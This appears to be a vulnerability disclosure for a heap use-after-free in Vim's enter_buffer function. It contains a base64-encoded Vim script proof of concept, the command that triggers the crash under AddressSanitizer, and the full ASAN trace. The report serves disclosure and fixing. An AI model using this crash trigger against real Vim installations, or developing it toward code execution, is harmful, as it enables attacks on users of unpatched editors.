Description

Use After Free in enter_buffer function.

commit : 5703310e640c4b142a16a3ea4f45317565ae8c32

Proof of Concept

$ echo -ne "ZnUgUigpCiAgdGFiIGxvcAogIGxldCBsOj1nCiAgZQEKbGYKZW5kZgoKY2FsIGFzYWwoIiIsUigp
KQpjYWwgYXNhbCgiIixSKCkpCmNhbCBhc2FsKCIiLFIoKSkKYnchCg==" | base64 -d > poc

# ASAN
$ ./src/vim -e -s -S poc -c ":qa!"
==3961346==ERROR: AddressSanitizer: heap-use-after-free on address 0x62500000c978 at pc 0x0000004e8700 bp 0x7fff02e62840 sp 0x7fff02e62838
READ of size 4 at 0x62500000c978 thread T0
    #0 0x4e86ff in enter_buffer /home/alkyne/fuzzing/vim-asan/src/buffer.c:1791:5
    #1 0x4f2afc in set_curbuf /home/alkyne/fuzzing/vim-asan/src/buffer.c:1772:2
    #2 0x4eeca9 in do_buffer_ext /home/alkyne/fuzzing/vim-asan/src/buffer.c:1551:5
    #3 0x4f0864 in do_buffer /home/alkyne/fuzzing/vim-asan/src/buffer.c:1572:12
    #4 0x4f0864 in do_bufdel /home/alkyne/fuzzing/vim-asan/src/buffer.c:1606:8
    #5 0x6a3fce in ex_bunload /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:5338:19
    #6 0x67f3d5 in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
    #7 0x67f3d5 in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
    #8 0xa71e9d in do_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1512:5
    #9 0xa7052d in cmd_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1098:14
    #10 0xa7052d in ex_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1124:2
    #11 0x67f3d5 in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
    #12 0x67f3d5 in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
    #13 0xd98977 in exe_commands /home/alkyne/fuzzing/vim-asan/src/main.c:3088:2
    #14 0xd98977 in vim_main2 /home/alkyne/fuzzing/vim-asan/src/main.c:774:2
    #15 0xd95f99 in main /home/alkyne/fuzzing/vim-asan/src/main.c:426:12
    #16 0x7fda0d3750b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #17 0x41eacd in _start (/home/alkyne/fuzzing/vim-asan/src/vim+0x41eacd)

0x62500000c978 is located 120 bytes inside of 9296-byte region [0x62500000c900,0x62500000ed50)
freed by thread T0 here:
    #0 0x496f8d in free (/home/alkyne/fuzzing/vim-asan/src/vim+0x496f8d)
    #1 0x4ea489 in free_buffer /home/alkyne/fuzzing/vim-asan/src/buffer.c:945:2

previously allocated by thread T0 here:
    #0 0x49720d in malloc (/home/alkyne/fuzzing/vim-asan/src/vim+0x49720d)
    #1 0x4c6d47 in lalloc /home/alkyne/fuzzing/vim-asan/src/alloc.c:248:11
    #2 0x663ffd in do_ecmd /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:2686:12
    #3 0x94f6a6 in qf_open_new_cwindow /home/alkyne/fuzzing/vim-asan/src/quickfix.c:4202:6
    #4 0x94f6a6 in ex_copen /home/alkyne/fuzzing/vim-asan/src/quickfix.c:4260:6

SUMMARY: AddressSanitizer: heap-use-after-free /home/alkyne/fuzzing/vim-asan/src/buffer.c:1791:5 in enter_buffer
Shadow bytes around the buggy address:
  0x0c4a7fff98d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff98e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff98f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff9900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff9910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff9920: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]
  0x0c4a7fff9930: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9940: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9950: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9960: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9970: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3961346==ABORTING

Impact

Use After Free may lead to exploiting the program, which can allow the attacker to execute arbitrary code.